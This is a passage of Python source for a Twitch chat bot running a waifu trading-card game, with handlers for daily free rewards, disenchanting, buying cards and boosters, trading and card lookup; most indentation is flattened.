msgArgs = (tags['display-name'], sum(pudding), pudding[0], pudding[1], pudding[2], config["puddingExchangeRate"])
self.message(channel, "%s, you have %d total pudding: %d earned this month, %d earned last month, %d expiring soon. !pudding list to see what boosters you can buy, !pudding booster <name> to buy a booster with pudding. !pudding topup <amount> to buy extra pudding (%s points each)" % msgArgs, isWhisper)
return
if command == "freewaifu" or command == "freebie":
# print("Checking free waifu egliability for " + str(sender))
with db.cursor() as cur:
cur.execute("SELECT lastFree, rewardSeqSeed, rewardSeqIndex FROM users WHERE id = %s", [tags['user-id']])
res = cur.fetchone()
nextFree = 79200000 + int(res[0])
if nextFree > current_milli_time():
datestring = formatTimeDelta(nextFree - current_milli_time(), False)
self.message(channel,
str(tags[
'display-name']) + ", you need to wait {0} for your next free drop!".format(
datestring), isWhisper=isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters_opened WHERE userid = %s AND status = 'open'", [tags['user-id']])
hasPack = cur.fetchone()[0] > 0
spaceInHand = currentCards(tags['user-id']) < handLimit(tags['user-id'])
freeData = getRewardsMetadata()
seed = res[1]
index = res[2]
if seed is None or index >= freeData[0]:
seed = generateRewardsSeed(*freeData)
index = 0
# retrieve their reward for this time
generator = random.Random(seed)
seq = list(range(freeData[0]))
generator.shuffle(seq)
rewardNum = seq[index]
if rewardNum >= freeData[1]:
# not good reward
lookup = [0, rewardNum - freeData[1]]
else:
# good
lookup = [1, rewardNum]
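# e.g. (hypothetical numbers) with 30 rewards of which 3 are good, rewardNum 0-2 maps to
# good rewards indexed 0-2 and rewardNum 3-29 maps to bad rewards indexed 0-26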
cur.execute("SELECT points, waifuid, waifu_rarity, boostername FROM free_rewards WHERE `is_good` = %s AND `index` = %s", lookup)
rewardInfo = cur.fetchone()
if rewardInfo is None:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# only one of the latter three rewards is allowed to be filled in, and there needs to be at least one reward.
cardRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(1, 4)])
ovrRewardCount = sum([(1 if rewardInfo[n] is not None else 0) for n in range(4)])
if cardRewardCount > 1 or ovrRewardCount == 0:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
# can they take the reward at the current time?
if (rewardInfo[1] is not None or rewardInfo[2] is not None) and hasPack and not spaceInHand:
# save seed in progress so it doesn't reset if this happens at the end of one
cur.execute("UPDATE users SET rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [seed, index, tags['user-id']])
self.message(channel, "%s, your hand is full and you have a booster open!" % tags['display-name'], isWhisper)
return
# if we made it this far they can receive it. process it
if rewardInfo[0] is not None:
addPoints(tags['user-id'], rewardInfo[0])
if cardRewardCount == 0:
self.message(channel, "%s, you got your daily free reward: %d points!" % (tags['display-name'], rewardInfo[0]), isWhisper)
pointsPrefix = ("%d points and " % rewardInfo[0]) if rewardInfo[0] is not None else ""
if rewardInfo[1] is not None or rewardInfo[2] is not None:
if rewardInfo[1] is not None:
wid = rewardInfo[1]
else:
wid = dropCard(rarity=rewardInfo[2], bannedCards=getUniqueCards(tags['user-id']))
row = getWaifuById(wid)
recordPullMetrics(row['id'])
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
boosterid = None
if not spaceInHand:
boosterid = addBooster(tags['user-id'], 'freebie', 0, 'open', 0, channel, isWhisper)
addCard(tags['user-id'], row['id'], 'freebie', boosterid)
if spaceInHand:
attemptPromotions(row['id'])
droplink = config["siteHost"] + "/booster?user=" + sender
msgArgs = {"username": tags['display-name'], "id": row['id'],
"rarity": config["rarity%dName" % row['base_rarity']],
"name": row['name'], "series": row['series'],
"link": row['image'] if spaceInHand else "",
"pack": " ( %s )" % droplink if not spaceInHand else "",
"points": pointsPrefix}
self.message(channel, "{username}, you got your daily free reward: {points}[{id}][{rarity}] {name} from {series} - {link}{pack}".format(**msgArgs), isWhisper)
if rewardInfo[3] is not None:
if hasPack:
# send the pack to freepacks
giveFreeBooster(tags['user-id'], rewardInfo[3])
self.message(channel, "%s, you got your daily free reward: %sa %s booster (sent to !freepacks)" % (tags['display-name'], pointsPrefix, rewardInfo[3]), isWhisper)
else:
try:
packid = openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, rewardInfo[3], False)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
self.message(channel, "%s, you got your daily free reward: %sa %s booster - %s/booster?user=%s" % (tags['display-name'], pointsPrefix, rewardInfo[3], config['siteHost'], sender), isWhisper)
except InvalidBoosterException:
discordbody = {
"username": "WTCG Admin",
"content" : "The free reward database is misconfigured, please fix it."
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "Could not retrieve your free reward, try again later.", isWhisper)
return
cur.execute("UPDATE users SET lastFree = %s, rewardSeqSeed = %s, rewardSeqIndex = %s WHERE id = %s", [current_milli_time(), seed, index + 1, tags['user-id']])
return
if command == "disenchant" or command == "de":
if len(args) == 0 or (len(args) == 1 and len(args[0]) == 0):
self.message(channel, "Usage: !disenchant <list of IDs>", isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
disenchants = []
dontHave = []
hand = getHand(tags['user-id'])
disenchantingSpecial = False
godRarity = int(config["numNormalRarities"]) - 1
for arg in args:
# handle disenchanting
try:
deTarget = parseHandCardSpecifier(hand, arg)
if deTarget in disenchants:
self.message(channel, "You can't disenchant the same waifu twice at once!", isWhisper)
return
if deTarget['rarity'] >= int(config["numNormalRarities"]) and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more special waifus! Special waifus do not take up any hand space and disenchant for 0 points. If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
if deTarget['rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config["rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
if deTarget['rarity'] != deTarget['base_rarity'] and not hasConfirmed:
self.message(channel,
"%s, you are trying to disenchant one or more promoted waifus! If you are sure you want to do this, append \" yes\" to the end of your command." %
tags['display-name'], isWhisper)
return
disenchants.append(deTarget)
except CardNotInHandException:
dontHave.append(arg)
except AmbiguousWaifuException:
self.message(channel,
"You have more than one copy of waifu %s in your hand. Please specify a card ID instead. You can find your card IDs using !checkhand" % (
arg), isWhisper)
return
except ValueError:
self.message(channel, "Could not decipher one or more of the waifu/card IDs you provided.",
isWhisper)
return
if len(dontHave) > 0:
if len(dontHave) == 1:
self.message(channel, "You don't own waifu %s." % dontHave[0], isWhisper)
else:
self.message(channel,
"You don't own the following waifus: %s" % ", ".join([id for id in dontHave]),
isWhisper)
return
# handle disenchants appropriately
pointsGain = 0
ordersFilled = 0
checkPromos = []
for row in disenchants:
if row['waifuid'] not in checkPromos:
checkPromos.append(row['waifuid'])
baseValue = int(config["rarity" + str(row['rarity']) + "Value"])
gain = disenchant(self, row['cardid'])
if row['base_rarity'] >= int(config["numNormalRarities"]):
disenchantingSpecial = True
pointsGain += gain
if gain > baseValue:
ordersFilled += 1
elif row['rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu disenchanted
waifuData = getWaifuById(row['waifuid'])
waifuData['base_rarity'] = row['rarity'] # cheat to make it show any promoted rarity override
threading.Thread(target=sendDisenchantAlert,
args=(channel, waifuData, tags["display-name"])).start()
if row['rarity'] == godRarity:
# check image change
with db.cursor() as cur:
cur.execute("UPDATE godimage_requests SET state='cancelled' WHERE requesterid = %s AND cardid = %s AND state = 'pending'", [tags['user-id'], row['cardid']])
if cur.rowcount > 0:
# request was cancelled
waifuData = getWaifuById(row['waifuid'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you disenchanted it." % (row['waifuid'], waifuData['name']), True)
attemptPromotions(*checkPromos)
addPoints(tags['user-id'], pointsGain)
if disenchantingSpecial:
checkFavouriteValidity(tags['user-id'])
if len(disenchants) == 1:
buytext = " (bounty filled)" if ordersFilled > 0 else ""
self.message(channel, "Successfully disenchanted waifu %d%s. %s gained %d points" % (
disenchants[0]['waifuid'], buytext, str(tags['display-name']), pointsGain), isWhisper=isWhisper)
else:
buytext = " (%d bounties filled)" % ordersFilled if ordersFilled > 0 else ""
self.message(channel,
"Successfully disenchanted %d waifus%s. Added %d points to %s's account" % (
len(disenchants), buytext, pointsGain, str(tags['display-name'])),
isWhisper=isWhisper)
return
if command == "giveme":
self.message(channel, "No.", isWhisper=isWhisper)
return
if command == "buy":
if len(args) != 1:
if len(args) > 0 and args[0].lower() == "booster":
self.message(channel, "%s, did you mean !booster buy?" % tags['display-name'], isWhisper)
else:
self.message(channel, "Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
if currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel,
"{sender}, you have too many cards to buy one! !disenchant some or upgrade your hand!".format(
sender=str(tags['display-name'])), isWhisper=isWhisper)
return
try:
rarity = parseRarity(args[0])
except Exception:
self.message(channel, "Unknown rarity. Usage: !buy <rarity> (So !buy uncommon for an uncommon)",
isWhisper=isWhisper)
return
price = int(config["rarity" + str(rarity) + "BuyPrice"])
if rarity >= int(config["numNormalRarities"]) or price <= 0:
self.message(channel, "You can't buy that rarity of waifu.", isWhisper=isWhisper)
return
if not hasPoints(tags['user-id'], price):
self.message(channel, "You do not have enough points to buy a " + str(
config["rarity" + str(rarity) + "Name"]) + " waifu. You need " + str(price) + " points.",
isWhisper=isWhisper)
return
chosenWaifu = dropCard(rarity=rarity, allowDowngrades=False,
bannedCards=getUniqueCards(tags['user-id']))
if chosenWaifu is not None:
addPoints(tags['user-id'], 0 - price)
row = getWaifuById(chosenWaifu)
self.message(channel, str(
tags[
'display-name']) + ', you bought a new Waifu for {price} points: [{id}][{rarity}] {name} from {series} - {link}'.format(
id=str(row['id']), rarity=config["rarity" + str(row['base_rarity']) + "Name"], name=row['name'],
series=row['series'],
link=row['image'], price=str(price)), isWhisper=isWhisper)
recordPullMetrics(row['id'])
addCard(tags['user-id'], row['id'], 'buy')
if row['base_rarity'] >= int(config["drawAlertMinimumRarity"]):
threading.Thread(target=sendDrawAlert, args=(channel, row, str(tags["display-name"]))).start()
attemptPromotions(row['id'])
return
else:
self.message(channel, "You can't buy a %s waifu right now. Try again later." % config[
"rarity" + str(rarity) + "Name"], isWhisper)
return
if command == "booster":
if len(args) < 1:
self.message(channel,
"Usage: !booster list OR !booster buy <%s> OR !booster select <take/disenchant> (for each waifu) OR !booster show" % visiblepacks,
isWhisper=isWhisper)
return
# check for confirmation
hasConfirmed = False
if args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
cmd = args[0].lower()
# even more shorthand shortcut for disenchant all
if cmd == "trash":
cmd = "select"
args = ["select", "deall"]
cur = db.cursor()
currBooster = getOpenBooster(tags['user-id'])
if (cmd == "show" or cmd == "select") and currBooster is None:
self.message(channel, tags[
'display-name'] + ", you do not have an open booster. Buy one using !booster buy <%s>" % visiblepacks,
isWhisper=isWhisper)
cur.close()
return
if cmd == "show":
if len(args) > 1 and args[1].lower() == "verbose":
# TODO
pass
else:
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, your current open booster pack: {droplink}".format(
user=tags['display-name'], droplink=droplink), isWhisper=isWhisper)
cur.close()
return
if cmd == "select":
# check for shorthand syntax
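# e.g. "!booster select dkk" expands to disenchant the first card and keep the other two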
if len(args) == 2:
if args[1].lower() == 'deall' or args[1].lower() == 'disenchantall':
selectArgs = ["disenchant"] * len(currBooster['cards'])
elif args[1].lower() == 'keep' or args[1].lower() == 'disenchant':
selectArgs = args[1:]
else:
selectArgs = []
for letter in args[1].lower():
if letter != 'd' and letter != 'k':
self.message(channel,
"When using shorthand booster syntax, please only use the letters d and k.",
isWhisper=isWhisper)
cur.close()
return
elif letter == 'd':
selectArgs.append("disenchant")
else:
selectArgs.append("keep")
else:
selectArgs = args[1:]
if len(selectArgs) != len(currBooster['cards']):
self.message(channel, "You did not specify the correct amount of keep/disenchant.",
isWhisper=isWhisper)
cur.close()
return
for arg in selectArgs:
if not (arg.lower() == "keep" or arg.lower() == "disenchant"):
self.message(channel,
"Sorry, but " + arg.lower() + " is not a valid option. Use keep or disenchant",
isWhisper=isWhisper)
cur.close()
return
# check card info for rarities etc
keepCards = []
deCards = []
keepingCount = 0
for i in range(len(currBooster['cards'])):
card = currBooster['cards'][i]
if selectArgs[i].lower() == "keep":
keepCards.append(card)
if card['base_rarity'] < int(config["numNormalRarities"]):
keepingCount += 1
else:
# disenchant
if card['base_rarity'] >= int(
config["disenchantRequireConfirmationRarity"]) and not hasConfirmed:
confirmRarityName = config[
"rarity%sName" % config["disenchantRequireConfirmationRarity"]]
self.message(channel,
"%s, you are trying to disenchant one or more waifus of %s rarity or higher! If you are sure you want to do this, append \" yes\" to the end of your command." % (
tags['display-name'], confirmRarityName), isWhisper)
return
deCards.append(card)
if keepingCount + currentCards(tags['user-id']) > handLimit(tags['user-id']) and keepingCount != 0:
self.message(channel, "You can't keep that many waifus! !disenchant some!", isWhisper=isWhisper)
cur.close()
return
trash = len(keepCards) == 0
# if we made it through the whole pack without tripping confirmation, we can actually do it now
for card in keepCards:
updateCard(card['cardid'], {"boosterid": None})
gottenpoints = 0
ordersFilled = 0
for card in deCards:
baseValue = int(config["rarity" + str(card['base_rarity']) + "Value"])
gain = disenchant(self, card['cardid'])
gottenpoints += gain
if gain > baseValue:
ordersFilled += 1
elif card['base_rarity'] >= int(config["disenchantAlertMinimumRarity"]):
# valuable waifu being disenchanted
threading.Thread(target=sendDisenchantAlert,
args=(channel, getWaifuById(card['waifuid']), str(tags["display-name"]))).start()
cardIDs = [row['waifuid'] for row in currBooster['cards']]
attemptPromotions(*cardIDs)
addPoints(tags['user-id'], gottenpoints)
# compile the message to be sent in chat
response = "You %s your booster pack%s" % (("trash", "") if trash else ("take"," and: "))
if len(keepCards) > 0:
response += " keep " + ', '.join(str(x['waifuid']) for x in keepCards) + ";"
if len(deCards) > 0 and not trash:
response += " disenchant the rest"
if ordersFilled > 0:
response += " (filling %d bounties);" % ordersFilled
elif len(deCards) > 0:
response += ";"
self.message(channel, response + ((" netting " + str(gottenpoints) + " points.") if gottenpoints>0 else ""),
isWhisper=isWhisper)
cur.execute("UPDATE boosters_opened SET status = 'closed', updated = %s WHERE id = %s",
[current_milli_time(), currBooster['id']])
cur.close()
return
if cmd == "list":
with db.cursor() as cur:
cur.execute("SELECT name, cost FROM boosters WHERE listed = 1 AND buyable = 1 ORDER BY sortIndex ASC")
boosters = cur.fetchall()
boosterInfo = ", ".join("%s / %d points" % (row[0], row[1]) for row in boosters)
self.message(channel, "Current buyable packs: %s. !booster buy <name> to buy a booster with points." % boosterInfo, isWhisper)
return
if cmd == "buy":
if currBooster is not None:
self.message(channel,
"You already have an open booster. Close it first!",
isWhisper=isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !booster buy <%s>" % visiblepacks, isWhisper=isWhisper)
cur.close()
return
truepackname = packname = args[1].lower()
mega = False
if packname.startswith("mega"):
truepackname = packname[4:]
mega = True
try:
openBooster(self, tags['user-id'], sender, tags['display-name'], channel, isWhisper, truepackname, True, mega)
if checkHandUpgrade(tags['user-id']):
messageForHandUpgrade(tags['user-id'], tags['display-name'], self, channel, isWhisper)
droplink = config["siteHost"] + "/booster?user=" + sender
self.message(channel, "{user}, you open a {type} booster: {droplink}".format(
user=tags['display-name'], type=packname, droplink=droplink), isWhisper=isWhisper)
except InvalidBoosterException:
self.message(channel, "Invalid booster type. Packs available right now: %s." % visiblepacks,
isWhisper=isWhisper)
except CantAffordBoosterException as exc:
self.message(channel,
"{user}, you don't have enough points for a {name} pack. You need {points}.".format(
user=tags['display-name'], name=packname, points=exc.cost),
isWhisper=isWhisper)
cur.close()
return
if command == "trade":
ourid = int(tags['user-id'])
with db.cursor() as cur:
# expire old trades
currTime = current_milli_time()
cur.execute(
"UPDATE trades SET status = 'expired', updated = %s WHERE status = 'open' AND created <= %s",
[currTime, currTime - 86400000])
if len(args) < 1 or (len(args) < 2 and args[0].lower() != "list"):
self.message(channel,
"Usage: !trade <check/accept/decline/cancel> <user> OR !trade <user> <have> <want> OR !trade list",
isWhisper=isWhisper)
return
subarg = args[0].lower()
if subarg == "list":
cur.execute("SELECT users.name FROM trades JOIN users ON trades.toid = users.id WHERE trades.fromid = %s AND trades.status = 'open'", [ourid])
sentTradesTo = [row[0] for row in cur.fetchall()]
cur.execute("SELECT users.name FROM trades JOIN users ON trades.fromid = users.id WHERE trades.toid = %s AND trades.status = 'open'", [ourid])
recvdTradesFrom = [row[0] for row in cur.fetchall()]
if len(sentTradesTo) == 0 and len(recvdTradesFrom) == 0:
self.message(channel, "You have no unresolved trades right now.", isWhisper)
else:
numTrades = len(sentTradesTo) + len(recvdTradesFrom)
parts = []
if len(sentTradesTo) > 0:
parts.append("Sent trades to: %s." % (", ".join(sentTradesTo)))
if len(recvdTradesFrom) > 0:
parts.append("Received trades from: %s." % (", ".join(recvdTradesFrom)))
self.message(channel, "%s, you have %d pending trade%s. %s"%(tags['display-name'], numTrades, "s" if numTrades > 1 else "", " ".join(parts)), isWhisper)
return
if subarg in ["check", "accept", "decline", "cancel"]:
otherparty = args[1].lower()
cur.execute("SELECT id FROM users WHERE name = %s", [otherparty])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
if ourid == otherid:
self.message(channel, "You cannot trade with yourself.", isWhisper)
return
if subarg == "cancel":
# different case here, since the trade is FROM us
cur.execute("SELECT id FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1", [ourid, otherid])
trade = cur.fetchone()
if trade is None:
self.message(channel, "You do not have a pending trade with %s. Send one with !trade %s <have> <want>" % (otherparty, otherparty), isWhisper)
else:
cur.execute("UPDATE trades SET status = 'cancelled', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
self.message(channel, "You cancelled your pending trade with %s." % otherparty, isWhisper)
sendPushNotification([otherid], {'type': 'tradeCancelled', 'image': 'https://lowee.de',
'message': "{otherplayer} has cancelled the trade with you.".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
# look for trade row
cur.execute(
"SELECT id, want, have, points, payup FROM trades WHERE fromid = %s AND toid = %s AND status = 'open' LIMIT 1",
[otherid, ourid])
trade = cur.fetchone()
if trade is None:
self.message(channel,
otherparty + " did not send you a trade. Send one with !trade " + otherparty + " <have> <want>",
isWhisper=isWhisper)
return
want = getCard(trade[1])
have = getCard(trade[2])
tradepoints = trade[3]
payup = trade[4]
# check that cards are still in place and owned by us
if want['userid'] is None or want['userid'] != ourid or have['userid'] is None or have['userid'] != otherid:
self.message(channel, "%s, one or more of the cards involved in the trade are no longer in their owners hands. Trade cancelled." % tags['display-name'], isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
return
if (want['tradeableAt'] is not None and want['tradeableAt'] > current_milli_time()) or (have['tradeableAt'] is not None and have['tradeableAt'] > current_milli_time()):
self.message(channel, "%s, one or more of the cards involved in the trade are no longer able to be traded. Trade cancelled." % tags['display-name'], isWhisper)
cur.execute("UPDATE trades SET status = 'invalid', updated = %s WHERE id = %s", [current_milli_time(), trade[0]])
return
if subarg == "check":
wantdata = getWaifuById(want['waifuid'])
havedata = getWaifuById(have['waifuid'])
haveStr = getWaifuRepresentationString(havedata['id'], havedata['base_rarity'], have['rarity'], havedata['name'])
wantStr = getWaifuRepresentationString(wantdata['id'], wantdata['base_rarity'], want['rarity'], wantdata['name'])
payer = "they will pay you" if otherid == payup else "you will pay them"
if tradepoints > 0:
self.message(channel,
"{other} wants to trade their {have} for your {want} and {payer} {points} points. Accept it with !trade accept {other}".format(
other=otherparty, have=haveStr, want=wantStr, payer=payer,
points=tradepoints), isWhisper=isWhisper)
else:
self.message(channel,
"{other} wants to trade their {have} for your {want}. Accept it with !trade accept {other}".format(
                                        other=otherparty, have=haveStr, want=wantStr),
isWhisper=isWhisper)
return
elif subarg == "decline":
cur.execute("UPDATE trades SET status = 'declined', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade declined.", isWhisper=isWhisper)
                        sendPushNotification([otherid], {'type': 'tradeDeclined', 'image': have['customImage'] if have['customImage'] is not None else have['image'],
'message': "{otherplayer} has declined your trade offer.".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
else:
# accept
nonpayer = ourid if payup == otherid else otherid
if tradepoints > 0 and not hasPoints(payup, tradepoints):
self.message(channel, "Sorry, but %s cannot cover the fair trading fee." % (
"you" if payup == ourid else otherparty),
isWhisper=isWhisper)
return
# move the cards
updateCard(want['id'], {"userid": otherid, "boosterid": None})
updateCard(have['id'], {"userid": ourid, "boosterid": None})
# cancel pending godimage requests for these cards
godRarity = int(config["numNormalRarities"]) - 1
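                            # the top normal rarity (numNormalRarities - 1) is the god tier, the tier
                            # that godimage (custom image) requests apply to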
if want['rarity'] == godRarity:
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE cardid = %s AND state = 'pending'", [want['id']])
if cur.rowcount > 0:
# a request was actually cancelled
wantdata = getWaifuById(want['waifuid'])
self.message("#%s" % sender, "Your image change request for [%d] %s was cancelled since you traded it away." % (want['waifuid'], wantdata['name']), True)
if have['rarity'] == godRarity:
cur.execute("UPDATE godimage_requests SET state = 'cancelled' WHERE cardid = %s AND state = 'pending'", [have['id']])
if cur.rowcount > 0:
# a request was actually cancelled
havedata = getWaifuById(have['waifuid'])
self.message("#%s" % otherparty, "Your image change request for [%d] %s was cancelled since you traded it away." % (have['waifuid'], havedata['name']), True)
attemptPromotions(want['waifuid'], have['waifuid'])
if want['rarity'] >= int(config["numNormalRarities"]):
checkFavouriteValidity(ourid)
if have['rarity'] >= int(config["numNormalRarities"]):
checkFavouriteValidity(otherid)
# points
addPoints(payup, -tradepoints)
addPoints(nonpayer, tradepoints)
# done
cur.execute("UPDATE trades SET status = 'accepted', updated = %s WHERE id = %s",
[current_milli_time(), trade[0]])
self.message(channel, "Trade executed!", isWhisper=isWhisper)
sendPushNotification([otherid], {'type': 'tradeAccepted', 'image': want['image'],
'message': "{otherplayer} has accepted your trade offer!".format(
otherplayer=tags['display-name']),
'openurl': 'https://twitch.tv/nepnepbot'})
return
if len(args) < 3:
self.message(channel,
"Usage: !trade <check/accept/decline/cancel> <user> OR !trade <user> <have> <want> OR !trade list",
isWhisper=isWhisper)
return
other = args[0]
cur.execute("SELECT id FROM users WHERE name = %s", [other])
otheridrow = cur.fetchone()
if otheridrow is None:
self.message(channel, "I don't recognize that username.", isWhisper=isWhisper)
return
otherid = int(otheridrow[0])
if ourid == otherid:
self.message(channel, "You cannot trade with yourself.", isWhisper)
return
ourhand = getHand(ourid)
otherhand = getHand(otherid)
try:
have = parseHandCardSpecifier(ourhand, args[1])
except CardNotInHandException:
self.message(channel, "%s, you don't own that waifu/card!" % tags['display-name'],
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, you own more than one rarity of waifu %s! Please specify a card ID instead. You can find card IDs using !checkhand" % (
tags['display-name'], args[1]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
if have["tradeableAt"] is not None and have["tradeableAt"] > current_milli_time():
self.message(channel, "%s, the card you are attempting to send in the trade is not tradeable right now!" % tags['display-name'], isWhisper)
return
try:
want = parseHandCardSpecifier(otherhand, args[2])
except CardNotInHandException:
self.message(channel,
"%s, %s doesn't own that waifu/card!" % (tags['display-name'], other),
isWhisper)
return
except AmbiguousWaifuException:
self.message(channel,
"%s, %s owns more than one rarity of waifu %s! Please specify a card ID instead." % (
tags['display-name'], other, args[2]), isWhisper)
return
except ValueError:
self.message(channel, "Only whole numbers/IDs please.", isWhisper)
return
if want["tradeableAt"] is not None and want["tradeableAt"] > current_milli_time():
self.message(channel, "%s, the card you are attempting to receive in the trade is not tradeable right now!" % tags['display-name'], isWhisper)
return
# actual specials can't be traded
firstSpecialRarity = int(config["numNormalRarities"])
if have["rarity"] == firstSpecialRarity or want["rarity"] == firstSpecialRarity:
self.message(channel, "Sorry, cards of that rarity cannot be traded.", isWhisper)
return
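            # 'payup' tracks who owes the points difference; default to us, flipped below
            # when the card we want is the lower-rarity side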
payup = ourid
canTradeDirectly = (want["rarity"] == have["rarity"]) or (
want["rarity"] >= firstSpecialRarity and have["rarity"] >= firstSpecialRarity)
points = 0
if not canTradeDirectly:
if have["rarity"] >= firstSpecialRarity or want["rarity"] >= firstSpecialRarity:
self.message(channel,
"Sorry, irregular rarity cards can only be traded for other irregular rarity cards.",
isWhisper=isWhisper)
return
highercost = int(config["rarity" + str(max(have["rarity"], want["rarity"])) + "Value"])
lowercost = int(config["rarity" + str(min(have["rarity"], want["rarity"])) + "Value"])
points = highercost - lowercost
if want["rarity"] < have["rarity"]:
payup = otherid
# cancel any old trades with this pairing
cur.execute(
"UPDATE trades SET status = 'cancelled', updated = %s WHERE fromid = %s AND toid = %s AND status = 'open'",
[current_milli_time(), ourid, otherid])
# insert new trade
tradeData = [ourid, otherid, want['cardid'], have['cardid'], points, payup,
current_milli_time(), "$$whisper$$" if isWhisper else channel]
cur.execute(
"INSERT INTO trades (fromid, toid, want, have, points, payup, status, created, originChannel) VALUES(%s, %s, %s, %s, %s, %s, 'open', %s, %s)",
tradeData)
havedata = getWaifuById(have['waifuid'])
wantdata = getWaifuById(want['waifuid'])
haveStr = getWaifuRepresentationString(have['waifuid'], havedata['base_rarity'], have['rarity'],
havedata['name'])
wantStr = getWaifuRepresentationString(want['waifuid'], wantdata['base_rarity'], want['rarity'],
wantdata['name'])
paying = ""
if points > 0:
if payup == ourid:
paying = " with you paying them " + str(points) + " points"
else:
paying = " with them paying you " + str(points) + " points"
self.message(channel,
"Offered {other} to trade your {have} for their {want}{paying}".format(other=other,
have=haveStr,
want=wantStr,
paying=paying),
isWhisper=isWhisper)
sendPushNotification([otherid], {'type': 'tradeOffered', 'image': have['image'],
'message': "{otherplayer} wants to trade their {have} for your {want}.".format(
otherplayer=tags['display-name'], have=haveStr,
want=wantStr), 'openurl': 'https://twitch.tv/nepnepbot'})
return
if command == "lookup":
if len(args) != 1:
self.message(channel, "Usage: !lookup <id>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[0])
assert waifu is not None
assert waifu['can_lookup'] == 1
ownerData = getWaifuOwners(waifu['id'], waifu['base_rarity'])
ownerDescriptions = ownerData[0]
packholders = ownerData[1]
if len(ownerDescriptions) > 3:
ownerDescriptions = ownerDescriptions[0:2] + ["%d others" % (len(ownerDescriptions) - 2)]
waifu["rarity"] = config["rarity%dName" % waifu["base_rarity"]]
# check for packs
if len(ownerDescriptions) > 0:
waifu["owned"] = " - owned by " + ", ".join(ownerDescriptions)
if len(packholders) > 0:
waifu["owned"] += "; in a pack for: " + ", ".join(packholders)
elif len(packholders) > 0:
waifu["owned"] = " - in a pack for: " + ", ".join(packholders)
elif waifu["pulls"] > 0:
waifu["owned"] = " (not currently owned or in a pack)"
else:
waifu["owned"] = " (not dropped yet)"
# bounty info
if waifu["base_rarity"] >= int(config["numNormalRarities"]):
waifu["bountyinfo"] = ""
waifu["lp"] = ""
else:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] > 0:
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
waifu[
"bountyinfo"] = " {count} current bounties, your bid is highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, your bid of {mine} points is lower than the highest at {highest} points.".format(
**minfo)
else:
waifu[
"bountyinfo"] = "{count} current bounties, the highest bid is {highest} points.".format(
**minfo)
else:
waifu["bountyinfo"] = "No current bounties on this waifu."
# last pull
if waifu["pulls"] == 0 or waifu["last_pull"] is None:
waifu["lp"] = ""
else:
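                            # 86,400,000 ms = one day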
lpdiff = (current_milli_time() - waifu["last_pull"]) // 86400000
if lpdiff == 0:
waifu["lp"] = " Last pulled less than a day ago."
elif lpdiff == 1:
waifu["lp"] = " Last pulled 1 day ago."
else:
waifu["lp"] = " Last pulled %d days ago." % lpdiff
self.message(channel,
'[{id}][{rarity}] {name} from {series} - {image}{owned}. {bountyinfo}{lp}'.format(
**waifu),
isWhisper=isWhisper)
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
                except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if command == "owners":
if len(args) != 1:
